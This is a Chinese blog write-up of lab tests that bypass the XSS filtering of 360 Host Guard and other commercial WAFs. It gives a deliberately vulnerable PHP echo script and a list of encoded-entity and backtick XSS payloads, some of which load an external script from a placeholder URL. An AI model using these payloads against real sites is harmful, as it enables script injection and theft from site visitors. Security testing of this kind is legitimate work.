文章详情
360主机卫士xss绕过,xss绕过多种防护技巧
日期:2020/2/24 15:31:16
前言
360主机卫士是360旗下的服务器安全软件,不过貌似不更新了。
(虽然软件几年前就停止更新,官网挂了,但是从当时的评论上看软件还是很不错的。)
环境
火狐
360主机卫士Apache版
phpStudy2016(PHP-5.4.45+Apache)
测试代码
<?php $input = @$_REQUEST["xss"]; echo "<div>".$input."</div>" ?>
测试
习惯性的直接上 Burp 用平时收集的 payload fuzz 一遍,结果不怎么理想,能过的很鸡肋...然后我就去网上找资料,找到了一篇文章xss加入某些字符即可过大多数waf的思路及一些思考根据里面的思路可以绕过。
<svg onload> 拦截
<svg > onload>不拦截
具体绕过就是先把 > html实体编码
将 > URL编码
大部分 xss payload 加上 %26%2362 即可绕过,但是类似 alert(1) 括号可能会被拦截 可以用反引号替换
<svg %26%2362 onload=alert`1`><svg %26%2362 onload=alert`1`>
给几个测试绕过的 payload
<style %26%2362 onload=alert`1`> <img %26%2362 src=1 onerror=alert`1`> <audio %26%2362 src=x onerror=alert`1`> <svg %26%2362 onload=appendChild(createElement('script')).src='url'>
该文章在最后说明此方法可以绕过多款waf,接下来我们来测试。
云锁:
绕过
<svg %26%2362 onload=alert`1`>
奇安信CDN:
拦截
<svg %26%2362 onload=alert`1`>
绕过方法(使用HTML5新标签)
<select autofocus onfocus=[2].find(alert)>
安全狗:
绕过
阿里云:
拦截
绕过方法(这个百度下就有)
<img src=# onerror=alert`2`> <input onfocus="document.body.appendChild(createElement('script')).src='url'" autofocus>
百度云加速:
绕过
小结
此次利用 > 字符的编码绕过的姿势,再到其他 waf 测试到此结束,至于其他特殊字符是否也有绕过,感兴趣的可以研究下。
上一文章:如何成为一名专业的网页设计师和程序员
相关推荐
- 05-07黑客是怎么赚钱的?黑客赚钱方法
- 03-12QQ密码破解器背后隐藏的骗局
- 02-25「本站活动」签到免费领会员,直播课程!
- 05-06黑客是如何炼成的(自学黑客4大知识点)
- 04-21QQ密码暴力破解器是真的假的?
- 05-24在互联网上如何保证自身权益?
- 10-08计算机网络:常见的网络攻击方式!黑客惯用的
- 09-09古典密码学基本原理和Base64算法原理
- 12-04网络安全人才平均年薪24万,人才缺口70万
- 06-10更新主板BIOS就是如此简单!
- 02-2695开头的是什么电话号码?是诈骗电话吗
- 03-30黑客为什么不攻击网贷平台?
- 06-04为什么fps会忽高忽低?有什么解决办法?
- 02-21黑客常用的5个攻击手段方法,你知道哪个?